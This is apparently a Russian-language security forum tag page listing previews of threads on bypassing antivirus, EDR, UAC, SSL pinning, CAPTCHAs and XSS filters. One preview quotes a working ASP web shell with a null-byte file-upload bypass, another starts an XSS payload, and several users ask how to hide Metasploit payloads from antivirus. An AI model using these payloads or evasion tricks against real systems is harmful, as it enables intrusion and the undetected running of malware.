bypass

  1. teddy1337

    Пентест 1С

    Привет дорогие форумчане помогите найти инфу об уязвимостях в 1С. В основном сейчас интересует кто-нибудь скули пробовал ли тыкать в авторизацию. И есть ли bypass авторизации и тд За любую интересную инфу по этому вопросу отдельное спасибо)
  2. szybnev

    Статья Скрываясь на виду у всех. №2

    Это вторая часть статьи о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Первая часть здесь, она обязательна к прочтению! Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущей статье...
  3. szybnev

    Статья Скрываясь на виду у всех. №1

    В этой статье представлен высокоуровневый обзор трассировки стека. Того, как EDR/AV используют трассировку для обнаружения, использования телеметрии ETWTI. Рассмотрим то, что можно сделать для её обхода. Итак, прежде чем мы обсудим уклонение, давайте сначала поймем, почему трассировка стека...
  4. Frintezza

    Ошибка при загрузки оболочки asp

    Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...
  5. N1GGA

    Статья Charles. Обход API авторизации в Android приложении

    1. Вступление Добрый день, уважаемые форумчане. Давно от меня не было статей, из-за того что проходил курс SQLiM aka SQL Injection Master от codeby. Хоть наш поток и закончился почти месяц назад, я хотел максимально закрепить пройденный материал и практиковался на разных ресурсах. Курс, кстате...
  6. F

    Как обойти бан в сетевой игре?

    Я слышал , что может помочь vpn , изменение mac и hwid. Еще я слышал , что существует более простой способ с помощью внутриигровых консольных команд и\или параметров запуска . Существует ли такой способ? Бан хочу обойти в gmod .
  7. V

    Как можно повысить score ReCAPTCHA v3?

    Как можно повысить score ReCAPTCHA v3? Возможно ли обойти ReCAPTCHA v3 без сервисов на подобии rucaptcha? Как ReCAPTCHA v3 определяет score? Решил написать бота при помощи phantomjs , но score равен 0.1. Решил протестировать и написал бота при помощи Selenium + Firefox, в таком случает, score...
  8. B

    Юзинг эксплойтов

    Всем привет. Недавно (хотя, уже давно) мне скинули ссылку с солянкой из эксплоитов UAC bypass - > hfiref0x/UACME. Собственно 2 проблемы: 1) Какие условия нужны, чтобы эксплойт сработал (в частности 5-ый, пока на нем сконцентрировался). Вроде как пробовал админский акк с настройками уведомлений...
  9. g00db0y

    Статья "Фальшивые отпечатки пальцев". Обход сканеров с 3Д-печатью

    В новых исследованиях, использовали технологию 3D-печати для байпаса сканеров отпечатков пальцев, и тестировали все это на мобильных устройствах Apple, Samsung и Microsoft. Новые исследования показали, что можно использовать технологию 3D-печати для создания "поддельных отпечатков пальцев"...
  10. alice_killer

    Payload Bypassing Eset

    Здравствуйте, попробовала создать пэйлойд используя Msfvenom и зашифровала шифром ShikatGaNai, в общем смогла скрыть от Avast, но ESET жестко палит, собственно прошу вас ответить на следующий вопрос: как скрыть пэйлоуд от антивируса ESET? если можно опишите пожалуйста более подробно. P.S...
  11. SooLFaa

    Статья Обход антивируса с помощью Метасплоита

    Первоисточник: Bypassing Detection for a Reverse Meterpreter Shell – Checkmate Перевод: Перевод выполнен от команды Codeby Примечание от команды форума: Статья является переводом. Метерпретер - это очень мощный по функционалу и основной payload для Metasploit. В статье рассматривается способ...
  12. PresetX

    Возможно ли использовать данное приложение в качестве Bypass UAC?

    https://sourceforge.net/projects/runassystem/ Этой программой пол года назад запускал exe-шники от системы на своей Win10x64, возможно ли ее сжать до состояния эксплойта и приспособить к работе? Антивирусы не ругались, работала просто отлично. Вроде поддерживает запуск прямо с командной строки...
  13. Tayrus

    Статья Универсальный обход SSL pinning для андроид приложений

    Привет всем, в этой статье, я объясню как обойти SSL pinning для андроид приложений используя Frida framework. Я попытаюсь объяснить все в деталях,четко и понятно. В этой статье будет рассмотрено: 1. Введение в Frida и SSL pinning 2. Требования 3. Настройка и установка 4. Установка Frida...
  14. Sa1nt

    Проблема webshell как действовать дальше?

    Заранее приношу извинения если создал не в том разделе( С поиском уязвимостей в web приложении и заливкой шелла никогда проблем не было. Но как всегда хочется большего ;) Собственно вопрос как просканировать и подобрать эксплойт для поднятия прав на удаленном web сервере, максимально...
  15. Vertigo

    Статья Атака ресурса с WhatWaf

    Добрый вечер,Уважаемые Друзья,Форумчане и Дорогие Гости. Долго меня терзали мучения по-поводу появившихся новинок из инструментария. Но как верно говорится,что если чем-то не устроил авторский труд-пройди мимо. Поэтому,ранее планируемого обзора нового сканера уязвимостей ,не будет. А хочу...
  16. SooLFaa

    XSS Tricks

    Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему. Payload #1: <svg xml:base="data:image/svg+xml;base64, PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW...
  17. Vertigo

    Статья morphHTA - Morphing Cobalt Strike PowerShell Evil HTA Generator

    Добрый день,Уважаемые Форумчане,Гости и те,кто следит за изменениями в мире ИБ. Сегодня будем знакомиться с интересным и несколько таинственным инструментом. morphHTA - инструмент для реализации атаки Powershell. Информации о нём очень мало,то что видел повергло меня в растерянность и...
  18. PingVinich

    Статья Обход антивирусов. Антиэмуляция, обход сигнатур и все все все. Часть I.

    Все части Часть II Привет! В этой статье мы обсудим и опробуем способы обхода антивирусов. Информация для подготовки статьи была взята отсюда. Обход антивирусов состоит из 2 больших шагов: Скрытие кода, который может быть опознан как вредоносный. В большинстве случаев это происходит при...
  19. Vander

    Статья SSCT - Враппер для Shadowsocks. Обход Firewall

    Приветствую! В этой небольшой статье хочу показать утилитку – враппер для shadowsocks. Областью ее применения будет обход файерволлов. Итак, Враппер - Обёртка системного вызова — программный модуль, перехватывающий поток ввода-вывода и изменяющий его в соответствии с заложенной программой. А...
  20. Vander

    Получение System Privelegies используя Eventvwr Registry Key Exploit

    Привет форумчанам и гостям форума. В этой статье мы рассмотрим способ получения системных привилегий на целевом хосте. Для начала нам потребуется активная сессия meterpreter на целевой машине. Как ее получить, я в этой статье рассказывать не буду, на форуме достаточно материала на эту тему. Я...